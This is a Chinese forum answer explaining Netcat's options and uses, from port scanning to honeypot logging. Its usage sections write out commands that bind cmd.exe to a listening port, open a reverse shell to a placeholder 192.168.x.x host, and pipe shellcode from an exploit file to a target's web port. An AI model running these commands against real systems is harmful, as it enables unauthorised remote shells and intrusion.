瑞士军刀NC的问题
发布网友
发布时间:2022-05-14 22:38
我来回答
共1个回答
热心网友
时间:2023-11-03 23:51
软件介绍:
工具名:Netcat
作者:Hobbit&&ChrisWysopal
网址:http://www.atstake.com/research/tools/network_utilities/
类别:开放源码
平台:Linux/BSD/Unix/Windows
WINDOWS下版本号:[v1.10NT]
=====================================================================================================
参数介绍:
'nc.exe-h'即可看到各参数的使用方法。
基本格式:nc[-options]hostnameport[s][ports]...
nc-l-pport[options][hostname][port]
-d后台模式
-eprog程序重定向,一旦连接,就执行[危险!!]
-ggatewaysource-routinghoppoint[s],upto8
-Gnumsource-routingpointer:4,8,12,...
-h帮助信息
-isecs延时的间隔
-l监听模式,用于入站连接
-L连接关闭后,仍然继续监听
-n指定数字的IP地址,不能用hostname
-ofile记录16进制的传输
-pport本地端口号
-r随机本地及远程端口
-saddr本地源地址
-t使用TELNET交互方式
-uUDP模式
-v详细输出--用两个-v可得到更详细的内容
-wsecstimeout的时间
-z将输入输出关掉--用于扫描时
端口的表示方法可写为M-N的范围格式。
=====================================================================================================
基本用法:
大概有以下几种用法:
1)连接到REMOTE主机,例子:
格式:nc-nvv192.168.x.x80
讲解:连到192.168.x.x的TCP80端口
2)监听LOCAL主机,例子:
格式:nc-l-p80
讲解:监听本机的TCP80端口
3)扫描远程主机,例子:
格式:nc-nvv-w2-z192.168.x.x80-445
讲解:扫描192.168.x.x的TCP80到TCP445的所有端口
4)REMOTE主机绑定SHELL,例子:
格式:nc-l-p5354-t-ec:\winnt\system32\cmd.exe
讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口
5)REMOTE主机绑定SHELL并反向连接,例子:
格式:nc-t-ec:\winnt\system32\cmd.exe192.168.x.x5354
讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口
以上为最基本的几种用法(其实NC的用法还有很多,
当配合管道命令"|"与重定向命令"<"、">"等等命令功能更强大......)。
=====================================================================================================
高级用法:
6)作攻击程序用,例子:
格式1:type.exec:\exploit.txt|nc-nvv192.168.x.x80
格式2:nc-nvv192.168.x.x80讲解:连接到192.168.x.x的80端口,并在其管道中发送'c:\exploit.txt'的内容(两种格式确有相同的效果,
真是有异曲同工之妙:P)
附:'c:\exploit.txt'为shellcode等
7)作蜜罐用[1],例子:
格式:nc-L-p80
讲解:使用'-L'(注意L是大写)可以不停地监听某一个端口,直到ctrl+c为止
8)作蜜罐用[2],例子:
格式:nc-L-p80>c:\log.txt
讲解:使用'-L'可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到'c:\log.txt'中,如果把'>'
改为'>>'即可以追加日志
附:'c:\log.txt'为日志等
9)作蜜罐用[3],例子:
格式1:nc-L-p80格式2:type.exec:\honeypot.txt|nc-L-p80
讲解:使用'-L'可以不停地监听某一个端口,直到ctrl+c为止,并把'c:\honeypot.txt'的内容'送'入其
管道中